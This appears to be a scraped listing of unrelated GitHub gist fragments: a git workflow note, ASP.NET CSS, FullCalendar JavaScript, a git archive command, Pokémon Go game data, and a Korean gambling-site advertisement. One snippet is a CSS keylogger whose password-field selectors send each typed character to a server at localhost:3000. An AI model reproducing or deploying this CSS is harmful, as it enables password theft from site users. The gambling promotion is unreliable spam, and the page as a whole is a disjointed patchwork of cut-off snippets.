masterbranch is always production-ready, deployable, 100% green test suite- New development is done on feature branches, with frequent rebasing onto master
- Clean commit history by preferring to rebase instead of merge (
git pullis configured to automatically rebase)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Please see documentation at https://docs.microsoft.com/aspnet/core/client-side/bundling-and-minification\ | |
| for details on configuring this project to bundle and minify static web assets. */ | |
| body { | |
| } | |
| /* Wrapping element */ | |
| /* Set some basic padding to keep content from hitting the edges */ | |
| .body-content { | |
| padding-left: 15px; | |
| padding-right: 15px; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| input[type="password"][value$=" "] { background-image: url("http://localhost:3000/+"); } | |
| input[type="password"][value$="!"] { background-image: url("http://localhost:3000/%21"); } | |
| input[type="password"][value$="\""] { background-image: url("http://localhost:3000/%22"); } | |
| input[type="password"][value$="#"] { background-image: url("http://localhost:3000/%23"); } | |
| input[type="password"][value$="$"] { background-image: url("http://localhost:3000/%24"); } | |
| input[type="password"][value$="%"] { background-image: url("http://localhost:3000/%25"); } | |
| input[type="password"][value$="&"] { background-image: url("http://localhost:3000/%26"); } | |
| input[type="password"][value$="'"] { background-image: url("http://localhost:3000/%27"); } | |
| input[type="password"][value$="("] { background-image: url("http://localhost:3000/%28"); } | |
| input[type="password"][value$=")"] { background-image: url("http://localhost:3000/%29"); } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| viewRender: function(currentView) { | |
| var minDate = moment(); // Today | |
| var maxDate = moment().add(2, 'weeks'); //Add 2 weeks for Today | |
| var navContainer = currentView.el.parent().prev() | |
| var disablePrev = currentView.start <= minDate; | |
| var disableNext = currentView.end >= maxDate; | |
| $(".fc-prev-button", navContainer).prop('disabled', disablePrev); | |
| $(".fc-prev-button", navContainer).toggleClass('fc-state-disabled', disablePrev); | |
| $(".fc-next-button", navContainer).prop('disabled', disableNext); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $('#calendar').fullCalendar({ | |
| viewRender: function(currentView){ | |
| var minDate = moment(), | |
| maxDate = moment().add(2,'weeks'); | |
| // Past | |
| if (minDate >= currentView.start && minDate <= currentView.end) { | |
| $(".fc-prev-button").prop('disabled', true); | |
| $(".fc-prev-button").addClass('fc-state-disabled'); | |
| } | |
| else { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| git archive --format=tar.gz -o /tmp/my-repo.tar.gz --prefix=my-repo/ master |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <body> | |
| <div class="main-body"> | |
| <img src="https://cloud.githubusercontent.com/assets/12628112/19336965/a81e6c20-9142-11e6-8f27-52afae7ec207.png" /> | |
| <h1>슬롯 1등 에그벳</h1> | |
| <h2>EGGC 에그벳 새로운 주소는</h2> | |
| <h2><a class="blog" href="https://eggckor.com/" target="_blank">https://eggckor.com/</a>입니다. <a href="https://eggckor.com/" target="_blank" class="rainbow"> ☜ 클릭하세요</a></h2> | |
| <h2>http<span class="red">s</span>:// << <span class="red">S</span>를 꼭 붙여주세요</h2> |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "Items": [ { | |
| "TemplateId": "BADGE_BATTLE_ATTACK_WON", | |
| "Badge": { | |
| "BadgeType": "BADGE_BATTLE_ATTACK_WON", | |
| "BadgeRanks": 4, | |
| "Targets": "\\nd\\350\\007" | |
| } | |
| }, { | |
| "TemplateId": "BADGE_BATTLE_TRAINING_WON", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Result: 1 | |
| Items { | |
| TemplateId: "BADGE_BATTLE_ATTACK_WON" | |
| Badge { | |
| BadgeType: BADGE_BATTLE_ATTACK_WON | |
| BadgeRanks: 4 | |
| Targets: "\nd\350\007" | |
| } | |
| } | |
| Items { |
